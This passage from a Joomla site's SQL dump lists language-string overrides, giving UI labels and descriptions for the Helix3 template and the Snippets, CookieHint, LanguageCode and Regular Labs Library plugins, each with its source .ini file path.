Home','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4679,'HELIX_TAGS','Tags','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4680,'HELIX3_COUNT_RATING','Rating','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4681,'HELIX3_COUNT_RATINGS','Ratings','/home/smthsmth/public_html/templates/shaper_helix3/en-GB.tpl_shaper_helix3.ini'),(4682,'PLG_EDITORS-XTD_SNIPPETS','Button - Regular Labs - Snippets','/home/smthsmth/public_html/plugins/editors-xtd/snippets/language/en-GB/en-GB.plg_editors-xtd_snippets.ini'),(4683,'PLG_EDITORS-XTD_SNIPPETS_DESC','Snippets - content placeholders in Joomla!','/home/smthsmth/public_html/plugins/editors-xtd/snippets/language/en-GB/en-GB.plg_editors-xtd_snippets.ini'),(4684,'SNIPPETS','Snippets','/home/smthsmth/public_html/plugins/editors-xtd/snippets/language/en-GB/en-GB.plg_editors-xtd_snippets.ini'),(4685,'SNIPPET','Snippet','/home/smthsmth/public_html/plugins/editors-xtd/snippets/language/en-GB/en-GB.plg_editors-xtd_snippets.ini'),(4686,'SNIPPETS_DESC','With Snippets you can include text snippets in your content.','/home/smthsmth/public_html/plugins/editors-xtd/snippets/language/en-GB/en-GB.plg_editors-xtd_snippets.ini'),(4687,'SNP_SETTINGS','Please see the [[%1:start link%]]Snippets component[[%2:end link%]] for settings.','/home/smthsmth/public_html/plugins/editors-xtd/snippets/language/en-GB/en-GB.plg_editors-xtd_snippets.ini'),(4688,'SNP_THE_COMPONENT','the Snippets component','/home/smthsmth/public_html/plugins/editors-xtd/snippets/language/en-GB/en-GB.plg_editors-xtd_snippets.ini'),(4689,'PLG_EDITORS-XTD_SNIPPETS','Button - Regular Labs - Snippets','/home/smthsmth/public_html/plugins/editors-xtd/snippets/language/en-GB/en-GB.plg_editors-xtd_snippets.sys.ini'),(4690,'PLG_EDITORS-XTD_SNIPPETS_DESC','Snippets - content placeholders in Joomla!','/home/smthsmth/public_html/plugins/editors-xtd/snippets/language/en-GB/en-GB.plg_editors-xtd_snippets.sys.ini'),(4691,'SNIPPETS','Snippets','/home/smthsmth/public_html/plugins/editors-xtd/snippets/language/en-GB/en-GB.plg_editors-xtd_snippets.sys.ini'),(4692,'PLG_SYSTEM_COOKIEHINT_HEAD','We use cookies','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4693,'PLG_SYSTEM_COOKIEHINT_INFO','<p>We use cookies on our website. Some of them are essential for the operation of the site, while others help us to improve this site and the user experience (tracking cookies). You can decide for yourself whether you want to allow cookies or not. Please note that if you reject them, you may not be able to use all the functionalities of the site.</p>','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4694,'PLG_SYSTEM_COOKIEHINT_BTN_INFO','More information','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4695,'PLG_SYSTEM_COOKIEHINT_BTN_IMPRINT','Imprint','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4696,'PLG_SYSTEM_COOKIEHINT_BTN_OK','Ok','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4697,'PLG_SYSTEM_COOKIEHINT_BTN_NOTOK','Decline','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4698,'PLG_SYSTEM_COOKIEHINT_DESCRIPTION','<strong>CookieHint and Consent Plugin for Joomla! 3.x</strong>','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4699,'PLG_SYSTEM_COOKIEHINT_LANGINFO','<i>How to set your own text:</i><br /><br />You can set the following language keys in your administration interface.<br />Go to Extensions > Languages > Overrides<br /><br />PLG_SYSTEM_COOKIEHINT_INFO<br />(Default Cookie Warning/Notification text)<br /><br />PLG_SYSTEM_COOKIEHINT_BTN_INFO<br />(Text for the more information link)<br /><br />PLG_SYSTEM_COOKIEHINT_BTN_OK<br />(text for the OK-Button)<br /><br />PLG_SYSTEM_COOKIEHINT_BTN_NOTOK<br />(text for the Decline-Button)<br /><br />Don\'t forget to select the correct language.','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4700,'PLG_SYSTEM_COOKIEHINT_NOTE_LINKS','Style','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4701,'PLG_SYSTEM_COOKIEHINT_NOTE_SETTINGS','Linking','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4702,'PLG_SYSTEM_COOKIEHINT_NOTE_STYLE','Settings','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4703,'PLG_SYSTEM_COOKIEHINT_MORE_INFO','Privacy Link','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4704,'PLG_SYSTEM_COOKIEHINT_MORE_INFO_DESC','This is the adress that links to your cookie-guidelines and more information page. Keep this field empty to hide the more-information-button.','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4705,'PLG_SYSTEM_COOKIEHINT_CSS','CSS-Style','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4706,'PLG_SYSTEM_COOKIEHINT_CSS_DESC','Choose the CSS-file you want to use. Your own CSS-file will be visible and can be choosen as soon as your file is uploaded to the \'plugins/system/cookiehint/css\'.','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4707,'PLG_SYSTEM_COOKIEHINT_PHP','HTML/PHP-Code','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4708,'PLG_SYSTEM_COOKIEHINT_PHP_DESC','If you want to change the complete cookie-hint layout, then you can do so here. Choose the PHP-file you want to use. Your own PHP-file will be visible and can be choosen as soon as your file is uploaded to the \'plugins/system/cookiehint/include\'.','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4709,'PLG_SYSTEM_COOKIEHINT_POSITION','Position','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4710,'PLG_SYSTEM_COOKIEHINT_POSITION_DESC','Position of the message','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4711,'PLG_SYSTEM_COOKIEHINT_POSITION_TOP','Top','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4712,'PLG_SYSTEM_COOKIEHINT_POSITION_BOTTOM','Bottom','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4713,'PLG_SYSTEM_COOKIEHINT_POSITION_MODAL','Standard (recommended)','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4714,'PLG_SYSTEM_COOKIEHINT_TEST','Test','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4715,'PLG_SYSTEM_COOKIEHINT_TEST_DESC','Testing','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4716,'PLG_SYSTEM_COOKIEHINT_MODE','Mode','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4717,'PLG_SYSTEM_COOKIEHINT_MODE_DAYS','The cookie notification has to be renewed in X days (value: validity in days).','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4718,'PLG_SYSTEM_COOKIEHINT_MODE_SESSION','The cookie notification must be reconfirmed with each new session.','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4719,'PLG_SYSTEM_COOKIEHINT_REFUSAL','Allow refusal of cookies','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4720,'PLG_SYSTEM_COOKIEHINT_REFUSAL_DESC','If you choose \'NO\', refusing cookies is not possible. With \'REDIRECT\' the visitor is redirected to an information page and also being excluded from the website visit. If set to \'Yes\', all cookies will be blocked by JavaScript until confirmation.','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4721,'PLG_SYSTEM_COOKIEHINT_REFUSAL_URL','Redirect URL by cookie rejection','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4722,'PLG_SYSTEM_COOKIEHINT_REFUSAL_URL_DESC','This URL will be redirected on a rejection','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4723,'PLG_SYSTEM_COOKIEHINT_COOKIEBLOCKER','Cookie blocker','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4724,'PLG_SYSTEM_COOKIEHINT_COOKIEBLOCKER_DESC','If you choose \'on\' all cookies will be blocked by JavaScript until confirmation.','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4725,'PLG_SYSTEM_COOKIEHINT_COOKIEEXPIRES','Validity in days','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4726,'PLG_SYSTEM_COOKIEHINT_COOKIEEXPIRES_DESC','After X days the cookie will be deleted','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4727,'PLG_SYSTEM_COOKIEHINT_REDIRECT','Redirect','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4728,'COM_PLUGINS_INFORMATION_FIELDSET_LABEL','Information','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4729,'COM_PLUGINS_CHANGELOG_FIELDSET_LABEL','Changelog','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4730,'PLG_SYSTEM_COOKIEHINT_COOKIEBLOCKER0','Disabled','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4731,'PLG_SYSTEM_COOKIEHINT_COOKIEBLOCKER1','Cookies only','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4732,'PLG_SYSTEM_COOKIEHINT_COOKIEBLOCKER2','Cookies and external sources (Content-Security-Policy)','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4733,'PLG_SYSTEM_COOKIEHINT_REALLY_NO','A refusal will affect the functions of the website. Do you really want to decline?','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4734,'PLG_SYSTEM_COOKIEHINT_YES_RECOMMENDED','Yes (recommended)','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4735,'PLG_SYSTEM_COOKIEHINT_REVOKETXT','%s','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4736,'PLG_SYSTEM_COOKIEHINT_URL_IMPRINT','Imprint link','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4737,'PLG_SYSTEM_COOKIEHINT_URL_IMPRINT_DESC','This is the adress that links to your imprint. Keep this field empty to hide the imprint-button.','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4738,'PLG_SYSTEM_COOKIEHINT_CSP','Content-Security-Policy','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4739,'PLG_SYSTEM_COOKIEHINT_CSP_DESC','HTTP-Header Content-Security-Policy - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.ini'),(4740,'PLG_SYSTEM_COOKIEHINT_DESCRIPTION','<strong>CookieHint and Consent Plugin for Joomla! 3.x</strong><br /><i>How to set your own text:</i><br /><br />You can set the following language keys in your administration interface.<br />Go to Extensions > Languages > Overrides<br /><br />PLG_SYSTEM_COOKIEHINT_INFO<br />(Default Cookie Warning/Notification text)<br /><br />PLG_SYSTEM_COOKIEHINT_BTN_INFO<br />(Text for the more information link)<br /><br />PLG_SYSTEM_COOKIEHINT_BTN_OK<br />(text for the OK Button)<br /><br />PLG_SYSTEM_COOKIEHINT_BTN_NOTOK<br />(text for the refuse Button)<br /><br />Don\'t forget to select the correct language.<br /><br />','/home/smthsmth/public_html/plugins/system/cookiehint/language/en-GB/en-GB.plg_system_cookiehint.sys.ini'),(4741,'PLG_SYSTEM_LANGUAGECODE','System - Language Code','/home/smthsmth/public_html/plugins/system/languagecode/language/en-GB/en-GB.plg_system_languagecode.ini'),(4742,'PLG_SYSTEM_LANGUAGECODE_FIELD_DESC','Changes the language code used for the <em>%s</em> language.','/home/smthsmth/public_html/plugins/system/languagecode/language/en-GB/en-GB.plg_system_languagecode.ini'),(4743,'PLG_SYSTEM_LANGUAGECODE_FIELDSET_DESC','Changes the language code for the generated HTML document. Example usage: You have installed the fr-FR language pack and want the Search Engines to recognise the page as aimed at French-speaking Canada. Add the tag \'fr-CA\' to the corresponding field for \'fr-FR\' to resolve this.','/home/smthsmth/public_html/plugins/system/languagecode/language/en-GB/en-GB.plg_system_languagecode.ini'),(4744,'PLG_SYSTEM_LANGUAGECODE_FIELDSET_LABEL','Language codes','/home/smthsmth/public_html/plugins/system/languagecode/language/en-GB/en-GB.plg_system_languagecode.ini'),(4745,'PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION','Provides the ability to change the language code in the generated HTML document to improve SEO.<br />The fields will appear when the plugin is enabled and saved.','/home/smthsmth/public_html/plugins/system/languagecode/language/en-GB/en-GB.plg_system_languagecode.ini'),(4746,'PLG_SYSTEM_LANGUAGECODE','System - Language Code','/home/smthsmth/public_html/plugins/system/languagecode/language/en-GB/en-GB.plg_system_languagecode.sys.ini'),(4747,'PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION','Provides ability to change the language code in the generated HTML document to improve SEO','/home/smthsmth/public_html/plugins/system/languagecode/language/en-GB/en-GB.plg_system_languagecode.sys.ini'),(4748,'PLG_SYSTEM_REGULARLABS','System - Regular Labs Library','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4749,'PLG_SYSTEM_REGULARLABS_DESC','Regular Labs Library - used by Regular Labs extensions','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4750,'REGULAR_LABS_LIBRARY','Regular Labs Library','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4751,'REGULAR_LABS_LIBRARY_DESC','[[%1:warning%]]The Regular Labs extensions need this plugin and will not function without it.<br><br>Regular Labs extensions include:[[%2:extensions%]]','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4752,'REGULAR_LABS_LIBRARY_DESC_WARNING','Do not uninstall or disable this plugin if you are using any Regular Labs extensions.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4753,'COM_MODULES_DESCRIPTION_FIELDSET_LABEL','Description','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4754,'COM_PLUGINS_DESCRIPTION_FIELDSET_LABEL','Description','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4755,'COM_PLUGINS_RL_DEFAULT_SETTINGS_FIELDSET_LABEL','Default Settings','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4756,'COM_PLUGINS_RL_SETTINGS_ADMIN_MODULE_FIELDSET_LABEL','Administrator Module Options','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4757,'COM_PLUGINS_RL_SETTINGS_EDITOR_BUTTON_FIELDSET_LABEL','Editor Button Options','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4758,'COM_PLUGINS_RL_SETTINGS_SECURITY_FIELDSET_LABEL','Security Options','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4759,'RL_ACCESS_LEVELS','Access Levels','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4760,'RL_ACCESS_LEVELS_DESC','Select the access levels to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4761,'RL_ADMIN','Admin','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4762,'RL_ADVANCED','Advanced','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4763,'RL_AKEEBASUBS','Akeeba Subscriptions','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4764,'RL_ALL','ALL','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4765,'RL_ALL_DESC','Will be published if <strong>ALL</strong> of below assignments are matched.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4766,'RL_ALL_RIGHTS_RESERVED','All Rights Reserved','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4767,'RL_ALSO_ON_CHILD_ITEMS','Also on child items','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4768,'RL_ALSO_ON_CHILD_ITEMS_DESC','Also assign to child items of the selected items?','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4769,'RL_ALSO_ON_CHILD_ITEMS_MENUITEMS_DESC','The child items refer to actual sub-items in the above selection. They do not refer to links on selected pages.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4770,'RL_ANY','ANY','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4771,'RL_ANY_DESC','Will be published if <strong>ANY</strong> (one or more) of below assignments are matched.<br>Assignment groups where \'Ignore\' is selected will be ignored.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4772,'RL_ARE_YOU_SURE','Are you sure?','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4773,'RL_ARTICLE','Article','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4774,'RL_ARTICLE_AUTHORS','Authors','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4775,'RL_ARTICLE_AUTHORS_DESC','Select the authors to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4776,'RL_ARTICLES','Articles','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4777,'RL_ARTICLES_DESC','Select the articles to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4778,'RL_AS_EXPORTED','As exported','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4779,'RL_ASSIGNMENTS_DESC','By selecting the specific assignments you can limit where this %s should or shouldn\'t be published.<br>To have it published on all pages, simply do not specify any assignments.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4780,'RL_AUSTRALIA','Australia','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4781,'RL_AUTO','Auto','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4782,'RL_BEHAVIOR','Behaviour','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4783,'RL_BOOTSTRAP','Bootstrap','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4784,'RL_BOOTSTRAP_FRAMEWORK_DISABLED','You have disabled the Bootstrap Framework to be initiated. %s needs the Bootstrap Framework to function. Make sure your template or other extensions load the necessary scripts to replace the required functionality.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4785,'RL_BOTH','Both','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4786,'RL_BOTTOM','Bottom','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4787,'RL_BROWSERS','Browsers','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4788,'RL_BROWSERS_DESC','Select the browsers to assign to. Keep in mind that browser detection is not always 100% accurate. Users can setup their browser to mimic other browsers','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4789,'RL_BUTTON_ICON','Button Icon','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4790,'RL_BUTTON_ICON_DESC','Select which icon to show in the button.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4791,'RL_BUTTON_TEXT','Button Text','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4792,'RL_BUTTON_TEXT_DESC','This text will be shown in the Editor Button.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4793,'RL_CACHE_TIME','Cache Time','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4794,'RL_CACHE_TIME_DESC','The maximum length of time in minutes for a cache file to be stored before it is refreshed. Leave empty to use the global setting.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4795,'RL_CATEGORIES','Categories','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4796,'RL_CATEGORIES_DESC','Select the categories to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4797,'RL_CHANGELOG','Changelog','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4798,'RL_CLASSNAME','CSS Class','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4799,'RL_COLLAPSE','Collapse','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4800,'RL_COM','Component','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4801,'RL_COMBINE_ADMIN_MENU','Combine Admin Menu','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4802,'RL_COMBINE_ADMIN_MENU_DESC','Select to combine all Regular Labs - components into a submenu in the administrator menu.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4803,'RL_COMPONENTS','Components','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4804,'RL_COMPONENTS_DESC','Select the components to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4805,'RL_CONTENT','Content','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4806,'RL_CONTENT_KEYWORDS','Content Keywords','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4807,'RL_CONTENT_KEYWORDS_DESC','Enter the keywords found in the content to assign to. Use commas to separate the keywords.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4808,'RL_CONTINENTS','Continents','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4809,'RL_CONTINENTS_DESC','Select the continents to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4810,'RL_COOKIECONFIRM','Cookie Confirm','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4811,'RL_COOKIECONFIRM_COOKIES','Cookies allowed','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4812,'RL_COOKIECONFIRM_COOKIES_DESC','Assign to whether cookies are allowed or disallowed, based on the configuration of Cookie Confirm (by Twentronix) and the visitor\'s choice to accept or decline cookies.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4813,'RL_COPY_OF','Copy of %s','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4814,'RL_COPYRIGHT','Copyright','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4815,'RL_COUNTRIES','Countries','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4816,'RL_COUNTRIES_DESC','Select the countries to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4817,'RL_CSS_CLASS','Class (CSS)','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4818,'RL_CSS_CLASS_DESC','Define a css classname for styling purposes.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4819,'RL_CURRENT_DATE','Current date/time: <strong>%s</strong>','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4820,'RL_CURRENT_VERSION','Your current version is %s','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4821,'RL_CUSTOM_CODE','Custom Code','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4822,'RL_CUSTOM_CODE_DESC','Enter the code the Editor Button should insert into the content (instead of the default code).','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4823,'RL_CUSTOM_FIELD','Custom Field','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4824,'RL_CUSTOM_FIELDS','Custom Fields','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4825,'RL_DATE','Date','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4826,'RL_DATE_RECURRING','Recurring','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4827,'RL_DATE_RECURRING_DESC','Select to apply date range every year. (So the year in the selection will be ignored)','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4828,'RL_DATE_TIME','Date & Time','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4829,'RL_DATE_TIME_DESC','The date and time assignments use the date/time of your servers, not that of the visitors system.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4830,'RL_DAYS','Days of the week','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4831,'RL_DAYS_DESC','Select days of the week to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4832,'RL_DEFAULT_ORDERING','Default Ordering','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(4833,'RL_DEFAULT_ORDERING_DESC','Set the default ordering of the list 